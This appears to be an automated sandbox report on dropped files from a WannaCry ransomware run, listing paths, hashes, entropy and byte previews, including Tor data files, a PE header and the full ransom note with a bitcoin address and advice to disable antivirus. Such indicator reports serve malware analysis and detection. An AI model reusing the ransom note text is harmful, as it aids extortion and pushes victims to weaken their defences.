                                                                                      Preview:WANACRY!........YU-:..e..5p....9..[.c .YY......#..i.|..P.v..^..P.r....l..|~..q; .7......bL....G#.}......[....ts."...EM....c}.N...%2.U.x..@N....Bt...5;.X.bm&.s..iq .k...v..o..w.-.w..A.IT...5...x..W8....Y.ss...Y(U...-..&..n.5....Q.j_.)i..L...BLc...z,Y.$..w|f....f$.........C..._`..W..>R.....4.V|..x.^.....XM.^|]o#R....@G.R.rg.....1..@l.._|...D.?.Y.6M.gZ....P.......h#>....D....uA..A...$...r.=~$...+&.:'.\w..p._l.?...bB.|...u......D.y.7....K..._..$....(.../U..7q_.X...)V.6.f..t@..~..u....U........[XM.{KE.x.2(....."p..}.Y<...cg....==..Q...M4.Ih..2.....v...%..'l..{Qo..,...=..\..{.=q..:..jg.......yt.c.}...Gm.Z{F..n*......Lr...r........|..../.>'.re...Y|.>.K..5.L.B.V.]%{NaE.....C....b.5..........:.>.....h.1'....g..U.....l...8......D..S._9.........v...-.......NK4{....~q...X....t.....w..(Y......W...[Y..6.w.w.k..... ..i...0.x= d.c...vA.p..C..TM./..wW_m..ni-.).v......Dd.?...V.y.!.j..F..R.G.-..R..20b.W.".;.Y...J..ZT..g.:.S.z,.k}..#[...,7*..}.r..%.7.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):9608
                                                                                      Entropy (8bit):7.979649480258606
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:zM3HUC7zKU7uwjfyf/WL+xnToh5/38EBEi4B6+vadBZOY26yT4RxG9:z+FVuUa/jxTysEEyTUYFyERq
                                                                                      MD5:3C537E7FFE8CFCA70D203AB9412F32CF
                                                                                      SHA1:BDEDB20741AC964D852BC6165956FF6E9F5EC08D
                                                                                      SHA-256:6B094FF7BF4DF45575EB8DBE13E4483C5691785DA19A0C61E52D2D2C87DEE809
                                                                                      SHA-512:C55A409E91D0F8E8198086E9ED941F73A6B05EF2E8462D04A42608A3E5777B9C542A5C036BF5896EA594E93E3172C971F3C38B294CD2D51315D047706A8AEB3A
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!........YU-:..e..5p....9..[.c .YY......#..i.|..P.v..^..P.r....l..|~..q; .7......bL....G#.}......[....ts."...EM....c}.N...%2.U.x..@N....Bt...5;.X.bm&.s..iq .k...v..o..w.-.w..A.IT...5...x..W8....Y.ss...Y(U...-..&..n.5....Q.j_.)i..L...BLc...z,Y.$..w|f....f$.........C..._`..W..>R.....4.V|..x.^.....XM.^|]o#R....@G.R.rg.....1..@l.._|...D.?.Y.6M.gZ....P.......h#>....D....uA..A...$...r.=~$...+&.:'.\w..p._l.?...bB.|...u......D.y.7....K..._..$....(.../U..7q_.X...)V.6.f..t@..~..u....U........[XM.{KE.x.2(....."p..}.Y<...cg....==..Q...M4.Ih..2.....v...%..'l..{Qo..,...=..\..{.=q..:..jg.......yt.c.}...Gm.Z{F..n*......Lr...r........|..../.>'.re...Y|.>.K..5.L.B.V.]%{NaE.....C....b.5..........:.>.....h.1'....g..U.....l...8......D..S._9.........v...-.......NK4{....~q...X....t.....w..(Y......W...[Y..6.w.w.k..... ..i...0.x= d.c...vA.p..C..TM./..wW_m..ni-.).v......Dd.?...V.y.!.j..F..R.G.-..R..20b.W.".;.Y...J..ZT..g.:.S.z,.k}..#[...,7*..}.r..%.7.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\taskhsvc.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):18574
                                                                                      Entropy (8bit):6.0530735251306345
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:jd24VdzVH591hFsNlyd4AW9V9hC1hIhf/40VVq1h8PXt/ea4igBVA1hrqb50IU48:R26ZJQlyrqvUgHJiO92a9gBSyb+3jntz
                                                                                      MD5:65CD1EEAFA9F1FA1B7F25BF55B0F7802
                                                                                      SHA1:6BAE354ACF311772AF1C2419225EE1EEDE752D78
                                                                                      SHA-256:8EE1F510558C28BE444F1DC51C090D189BB9E6D5D03C03482C16B35053BFDB36
                                                                                      SHA-512:EF45829D2CF0840B9B6D183BCA61DB4D7401600382CB981CE1EEA06B90D80B643EBE718AEAE32B259900893C70EE578DDCBC5B74A71EEC20DFEF165063A7FFB1
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:dir-key-certificate-version 3..fingerprint ED03BB616EB2F60BEC80151114BB25CEF515B226..dir-key-published 2024-02-18 11:38:40..dir-key-expires 2025-02-18 11:38:40..dir-identity-key..-----BEGIN RSA PUBLIC KEY-----..MIIBigKCAYEA1d6uTRiqdMp4BHBYIHKR6NB599Z1Bqw4TbOVkM2N1aSA4V/L/hKI..nl6m/2LL/UAS+E3NCFX0dhw2+D7r7BTJyfGwz0H2MR6Py5/rCMAnPl20wCjXk2qY..ACQa0rJvIqXobwGnDlvxn4ezsj0IEY/FEb61zHnnPHf6d3uyFR1QT06qEOQyYzML..76f/Lud8MUt+8KzsdnadAPL8okNvcS/nqa2bWbbGhC8S8rtDpPg5BhX2ikXa88RM..QdrrackdppB2ttHlq9+iH3c8Wyp7bvdH8uhv410W7RnIE4P+KIxt3L0gqkxCjjyh..mn9ONcdgNOKe31q2cdW5LOPSIK+I5/VTjYjICza7Euyg03drpoBMGLuuJZY6FXEV..auIBncWe+So8FMxqU/fwo5xm6x085U1MwXUmi4XDYpr/kau6ytPnzzw9J++4W9iC..em5Jp0vaxrDnPdphqT0FWsBAwsZFL7nZRnmUlTgGsXUa0oSM9/MErDwzELh/NwG4..DNyyzRG8iP61AgMBAAE=..-----END RSA PUBLIC KEY-----..dir-signing-key..-----BEGIN RSA PUBLIC KEY-----..MIIBCgKCAQEA7DredMbjxY/BwoH2+bRNSrGpMyNVqTUhss74vJqtFn+BwdRx/cCa..vuTdOf5B40T0EDuaLMHsSj00HN7dRbzf54uunuWNtlAM/7XkTNaB73RLLGOpVJHz..3NO/M1kdGm4evU0y4q+JD9Fx46xc
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\taskhsvc.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):18574
                                                                                      Entropy (8bit):6.0530735251306345
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:jd24VdzVH591hFsNlyd4AW9V9hC1hIhf/40VVq1h8PXt/ea4igBVA1hrqb50IU48:R26ZJQlyrqvUgHJiO92a9gBSyb+3jntz
                                                                                      MD5:65CD1EEAFA9F1FA1B7F25BF55B0F7802
                                                                                      SHA1:6BAE354ACF311772AF1C2419225EE1EEDE752D78
                                                                                      SHA-256:8EE1F510558C28BE444F1DC51C090D189BB9E6D5D03C03482C16B35053BFDB36
                                                                                      SHA-512:EF45829D2CF0840B9B6D183BCA61DB4D7401600382CB981CE1EEA06B90D80B643EBE718AEAE32B259900893C70EE578DDCBC5B74A71EEC20DFEF165063A7FFB1
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:dir-key-certificate-version 3..fingerprint ED03BB616EB2F60BEC80151114BB25CEF515B226..dir-key-published 2024-02-18 11:38:40..dir-key-expires 2025-02-18 11:38:40..dir-identity-key..-----BEGIN RSA PUBLIC KEY-----..MIIBigKCAYEA1d6uTRiqdMp4BHBYIHKR6NB599Z1Bqw4TbOVkM2N1aSA4V/L/hKI..nl6m/2LL/UAS+E3NCFX0dhw2+D7r7BTJyfGwz0H2MR6Py5/rCMAnPl20wCjXk2qY..ACQa0rJvIqXobwGnDlvxn4ezsj0IEY/FEb61zHnnPHf6d3uyFR1QT06qEOQyYzML..76f/Lud8MUt+8KzsdnadAPL8okNvcS/nqa2bWbbGhC8S8rtDpPg5BhX2ikXa88RM..QdrrackdppB2ttHlq9+iH3c8Wyp7bvdH8uhv410W7RnIE4P+KIxt3L0gqkxCjjyh..mn9ONcdgNOKe31q2cdW5LOPSIK+I5/VTjYjICza7Euyg03drpoBMGLuuJZY6FXEV..auIBncWe+So8FMxqU/fwo5xm6x085U1MwXUmi4XDYpr/kau6ytPnzzw9J++4W9iC..em5Jp0vaxrDnPdphqT0FWsBAwsZFL7nZRnmUlTgGsXUa0oSM9/MErDwzELh/NwG4..DNyyzRG8iP61AgMBAAE=..-----END RSA PUBLIC KEY-----..dir-signing-key..-----BEGIN RSA PUBLIC KEY-----..MIIBCgKCAQEA7DredMbjxY/BwoH2+bRNSrGpMyNVqTUhss74vJqtFn+BwdRx/cCa..vuTdOf5B40T0EDuaLMHsSj00HN7dRbzf54uunuWNtlAM/7XkTNaB73RLLGOpVJHz..3NO/M1kdGm4evU0y4q+JD9Fx46xc
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\taskhsvc.exe
                                                                                      File Type:ASCII text, with very long lines (1006), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2753554
                                                                                      Entropy (8bit):5.638874995023527
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:v2QoI6HaEdaxiWrl4aBE9jCPQXc0vxnLquT86rf0HzU79O02Bbd0ioAZY2l6g3Pl:vI/axRwvm5YgwqszPe
                                                                                      MD5:88805AB05993125CD9FCCEBF5E9556E6
                                                                                      SHA1:2D390C30791A7604BC49A5492FF24C4146E1B5A9
                                                                                      SHA-256:77D15C63E8B188597F3E3E507924A0F4206C734A304C408B9A2404819C187A22
                                                                                      SHA-512:33DD059BD4FC3AB941637A5AA68819F1D38D0D4EE877A81FD578DA50FD22B90ADC505988E8401AC091F2E93EDB00549D97CBFBD46040C029EF3B434BCC8EEDA3
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:network-status-version 3 microdesc..vote-status consensus..consensus-method 33..valid-after 2024-03-23 14:00:00..fresh-until 2024-03-23 15:00:00..valid-until 2024-03-23 17:00:00..voting-delay 300 300..client-versions 0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10..server-versions 0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10..known-flags Authority BadExit Exit Fast Guard HSDir MiddleOnly NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid..recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 Microdesc=2 Relay=2..recommended-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2..required-client-protocols Cons=2 Desc=2 Link=4 Microdesc=2 Relay=2..required-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2..params AuthDirMaxServersPerAddr=8
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\taskhsvc.exe
                                                                                      File Type:ASCII text, with very long lines (1006), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2753554
                                                                                      Entropy (8bit):5.638874995023527
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:v2QoI6HaEdaxiWrl4aBE9jCPQXc0vxnLquT86rf0HzU79O02Bbd0ioAZY2l6g3Pl:vI/axRwvm5YgwqszPe
                                                                                      MD5:88805AB05993125CD9FCCEBF5E9556E6
                                                                                      SHA1:2D390C30791A7604BC49A5492FF24C4146E1B5A9
                                                                                      SHA-256:77D15C63E8B188597F3E3E507924A0F4206C734A304C408B9A2404819C187A22
                                                                                      SHA-512:33DD059BD4FC3AB941637A5AA68819F1D38D0D4EE877A81FD578DA50FD22B90ADC505988E8401AC091F2E93EDB00549D97CBFBD46040C029EF3B434BCC8EEDA3
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:network-status-version 3 microdesc..vote-status consensus..consensus-method 33..valid-after 2024-03-23 14:00:00..fresh-until 2024-03-23 15:00:00..valid-until 2024-03-23 17:00:00..voting-delay 300 300..client-versions 0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10..server-versions 0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10..known-flags Authority BadExit Exit Fast Guard HSDir MiddleOnly NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid..recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 Microdesc=2 Relay=2..recommended-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2..required-client-protocols Cons=2 Desc=2 Link=4 Microdesc=2 Relay=2..required-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2..params AuthDirMaxServersPerAddr=8
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\taskhsvc.exe
                                                                                      File Type:ASCII text, with very long lines (12354)
                                                                                      Category:dropped
                                                                                      Size (bytes):19769006
                                                                                      Entropy (8bit):4.842678847329458
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:XeQ8NoBWXi2QSDyqQJlQ5bjvStt1H72bnXxg0FXnetyRRY+Ql9pQeUMhbls3UH7t:OaUAlpmT/8nU1AhZj7PVuU
                                                                                      MD5:3172B9E8330E76BDE57B6F24060064CE
                                                                                      SHA1:C58D9E9328ABDEB681DF8287811BB908BED73251
                                                                                      SHA-256:5E4973F5025204B6B9C3C85638E4964A6F8087806C89E6B79574E8ED421551DB
                                                                                      SHA-512:EAD78126CCCF681EB76225E77A95B44247485A24191B3913D7EFFB333D58297C0580CC5A5541E519DC98BED6E9F366916AB231B5E5A821416BD4B1CEB5B9BD7B
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:@last-listed 2024-03-23 14:48:23.onion-key.-----BEGIN RSA PUBLIC KEY-----.MIGJAoGBAMRabOMQifoiB/AEgLVCP7sS6tL+rBNp1XRHpsKtbuBQo8c29GuMZNfq.KKj0aCOjmG0yP8YLJRs3Aw3NXpcJ/JYkpJAZz7n0NubVqkjb9iooQhLO+QNyryEK.EurKQfDJ93LaFvF0A5mbAbYJekS+qbTNElbaGjo1nnuGWmaDP/43AgMBAAE=.-----END RSA PUBLIC KEY-----.ntor-onion-key HsF0fkX3q+p28lxFuBIqm8vRcVQ3LQUjAUadieYU7C4.family $0011254CC8444369B20EF11156B8990438221A54 $8E8EA695740B2098C70A9851B2CF839B9A4435EB $A088AACFD7493D75EBAB140546EBEFC9F1326CA7.p accept 20-21,23,43,53,79-81,88,110,143,194,220,389,443,464-465,531,543-544,554,563,587,636,706,749,853,873,902-904,981,989-995,1194,1220,1293,1500,1533,1677,1723,1755,1863,2082-2083,2086-2087,2095-2096,2102-2104,3128,3389,3690,4321,4643,5050,5190,5222-5223,5228,5900,6660-6669,6679,6697,8000,8008,8074,8080,8082,8087-8088,8232-8233,8332-8333,8443,8888,9418,9999-10000,11371,19294,19638,50002,64738.id ed25519 oes7j3aluNkSZRmdiflkiJqarj55EFucHDF65b7XiKs.@last-listed 2024-03-23 14:48:23.onion-key.-----BEGIN RSA P
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\taskhsvc.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):384
                                                                                      Entropy (8bit):5.233962170303801
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:SbdWwxXIbnXr87+QVe2vwR/EnzuX5kTKKAOasT0Lgx5kTKKALGUtMRlWWURbibfb:bwxXsXr87HVBvwNiQkTKKAON0+kTKKA+
                                                                                      MD5:1EC225948F18A47912506CE8464F73D7
                                                                                      SHA1:264D7FC6C44886BA2E9A7AC60430AAAEA141FCB2
                                                                                      SHA-256:9D74C73144132ED4FB55195E69FC06BB80FD596A8D1FF83479A3104BD1F06EAF
                                                                                      SHA-512:CEA44CAB2B0D5F378819D068499FD748C7EDE00B6D8AC876525909D2E61ED116EC67A2F48E683D6237FAF0F3FE7185059FF87124986C7E008AFFC444D4A351AB
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:# Tor state file last generated on 2024-03-23 15:48:41 local time..# Other times below are in UTC..# You *do not* need to edit this file.....EntryGuard sharkwatch 17C2FBA1F1AAB637E92247D060A734FD6786433B DirCache..EntryGuardAddedBy 17C2FBA1F1AAB637E92247D060A734FD6786433B 0.2.9.10 2024-02-29 14:58:42..TorVersion Tor 0.2.9.10 (git-1f6c8eda0073f464)..LastWritten 2024-03-23 14:48:41..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\taskhsvc.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):384
                                                                                      Entropy (8bit):5.233962170303801
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:SbdWwxXIbnXr87+QVe2vwR/EnzuX5kTKKAOasT0Lgx5kTKKALGUtMRlWWURbibfb:bwxXsXr87HVBvwNiQkTKKAON0+kTKKA+
                                                                                      MD5:1EC225948F18A47912506CE8464F73D7
                                                                                      SHA1:264D7FC6C44886BA2E9A7AC60430AAAEA141FCB2
                                                                                      SHA-256:9D74C73144132ED4FB55195E69FC06BB80FD596A8D1FF83479A3104BD1F06EAF
                                                                                      SHA-512:CEA44CAB2B0D5F378819D068499FD748C7EDE00B6D8AC876525909D2E61ED116EC67A2F48E683D6237FAF0F3FE7185059FF87124986C7E008AFFC444D4A351AB
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:# Tor state file last generated on 2024-03-23 15:48:41 local time..# Other times below are in UTC..# You *do not* need to edit this file.....EntryGuard sharkwatch 17C2FBA1F1AAB637E92247D060A734FD6786433B DirCache..EntryGuardAddedBy 17C2FBA1F1AAB637E92247D060A734FD6786433B 0.2.9.10 2024-02-29 14:58:42..TorVersion Tor 0.2.9.10 (git-1f6c8eda0073f464)..LastWritten 2024-03-23 14:48:41..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\taskhsvc.exe
                                                                                      File Type:ASCII text, with very long lines (1006), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2753554
                                                                                      Entropy (8bit):5.638874995023527
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:v2QoI6HaEdaxiWrl4aBE9jCPQXc0vxnLquT86rf0HzU79O02Bbd0ioAZY2l6g3Pl:vI/axRwvm5YgwqszPe
                                                                                      MD5:88805AB05993125CD9FCCEBF5E9556E6
                                                                                      SHA1:2D390C30791A7604BC49A5492FF24C4146E1B5A9
                                                                                      SHA-256:77D15C63E8B188597F3E3E507924A0F4206C734A304C408B9A2404819C187A22
                                                                                      SHA-512:33DD059BD4FC3AB941637A5AA68819F1D38D0D4EE877A81FD578DA50FD22B90ADC505988E8401AC091F2E93EDB00549D97CBFBD46040C029EF3B434BCC8EEDA3
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:network-status-version 3 microdesc..vote-status consensus..consensus-method 33..valid-after 2024-03-23 14:00:00..fresh-until 2024-03-23 15:00:00..valid-until 2024-03-23 17:00:00..voting-delay 300 300..client-versions 0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10..server-versions 0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10..known-flags Authority BadExit Exit Fast Guard HSDir MiddleOnly NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid..recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 Microdesc=2 Relay=2..recommended-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2..required-client-protocols Cons=2 Desc=2 Link=4 Microdesc=2 Relay=2..required-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2..params AuthDirMaxServersPerAddr=8
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\taskhsvc.exe
                                                                                      File Type:ASCII text, with very long lines (1006), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2753554
                                                                                      Entropy (8bit):5.638874995023527
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:v2QoI6HaEdaxiWrl4aBE9jCPQXc0vxnLquT86rf0HzU79O02Bbd0ioAZY2l6g3Pl:vI/axRwvm5YgwqszPe
                                                                                      MD5:88805AB05993125CD9FCCEBF5E9556E6
                                                                                      SHA1:2D390C30791A7604BC49A5492FF24C4146E1B5A9
                                                                                      SHA-256:77D15C63E8B188597F3E3E507924A0F4206C734A304C408B9A2404819C187A22
                                                                                      SHA-512:33DD059BD4FC3AB941637A5AA68819F1D38D0D4EE877A81FD578DA50FD22B90ADC505988E8401AC091F2E93EDB00549D97CBFBD46040C029EF3B434BCC8EEDA3
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:network-status-version 3 microdesc..vote-status consensus..consensus-method 33..valid-after 2024-03-23 14:00:00..fresh-until 2024-03-23 15:00:00..valid-until 2024-03-23 17:00:00..voting-delay 300 300..client-versions 0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10..server-versions 0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10..known-flags Authority BadExit Exit Fast Guard HSDir MiddleOnly NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid..recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 Microdesc=2 Relay=2..recommended-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2..required-client-protocols Cons=2 Desc=2 Link=4 Microdesc=2 Relay=2..required-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2..params AuthDirMaxServersPerAddr=8
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):933
                                                                                      Entropy (8bit):4.711824502619554
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnGhRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3KghvWmMo+S
                                                                                      MD5:7A2726BB6E6A79FB1D092B7F2B688AF0
                                                                                      SHA1:B3EFFADCE8B76AEE8CD6CE2ECCBB8701797468A2
                                                                                      SHA-256:840AB19C411C918EA3E7526D0DF4B9CB002DE5EA15E854389285DF0D1EA9A8E5
                                                                                      SHA-512:4E107F661E6BE183659FDD265E131A64CCE2112D842226305F6B111D00109A970FDA0B5ABFB1DAA9F64428E445E3B472332392435707C9AEBBFE94C480C72E54
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:PC bitmap, Windows 3.x format, 800 x 600 x 24, image size 1440000, resolution 3779 x 3779 px/m, cbSize 1440054, bits offset 54
                                                                                      Category:dropped
                                                                                      Size (bytes):1440054
                                                                                      Entropy (8bit):0.3363393123555661
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:zYzuP4tiuOub2WuzvqOFgjexqO5XgYWTIWv/+:sbL+
                                                                                      MD5:C17170262312F3BE7027BC2CA825BF0C
                                                                                      SHA1:F19ECEDA82973239A1FDC5826BCE7691E5DCB4FB
                                                                                      SHA-256:D5E0E8694DDC0548D8E6B87C83D50F4AB85C1DEBADB106D6A6A794C3E746F4FA
                                                                                      SHA-512:C6160FD03AD659C8DD9CF2A83F9FDCD34F2DB4F8F27F33C5AFD52ACED49DFA9CE4909211C221A0479DBBB6E6C985385557C495FC04D3400FF21A0FBBAE42EE7C
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:BM6.......6...(... ...X.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):245760
                                                                                      Entropy (8bit):6.278920408390635
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:Rmrhd5U1eigWcR+uiUg6p4FLlG4tlL8z+mmCeHFZjoHEo3m:REd5+IZiZhLlG4AimmCo
                                                                                      MD5:7BF2B57F2A205768755C07F238FB32CC
                                                                                      SHA1:45356A9DD616ED7161A3B9192E2F318D0AB5AD10
                                                                                      SHA-256:B9C5D4339809E0AD9A00D4D3DD26FDF44A32819A54ABF846BB9B560D81391C25
                                                                                      SHA-512:91A39E919296CB5C6ECCBA710B780519D90035175AA460EC6DBE631324E5E5753BD8D87F395B5481BCD7E1AD623B31A34382D81FAAE06BEF60EC28B49C3122A9
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 96%
                                                                                      Reputation:low
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%...a...a...a......b.......u.......`.....d.......j.......e...W...b...a.......W...s.......`...Richa...................PE..L.....[J.................@...p.......1.......P....@..................................................................................0..|............................................................................P...............................text....3.......@.................. ..`.rdata..h....P.......P..............@..@.data....2.......0..................@....rsrc...|....0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.804458777090648
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:y3mh59kFAKIS97gZZSqOmHH3xE8oyQeC5hP4ddJuAbe8:yvFHVm6mHLoDZhP4ddJe8
                                                                                      MD5:929F16F6B837FFDC60247AED71E11C0A
                                                                                      SHA1:E4B9F4A324AB5DBD45FD8D58D867FF289206324C
                                                                                      SHA-256:2370E3AAD437B3953CB529182A82DE4D404676A4734646370028AAAF3980BF87
                                                                                      SHA-512:62652D05A3E80E1625E6A7C360021B10FFAB41F2796180AB874078AE8F21F5ECBFDF530FC653309773F3ECFA2A350A2F21CA1F2AAB0D9B5EC8DFAAD9E58C9321
                                                                                      Malicious:false
                                                                                      Reputation:low
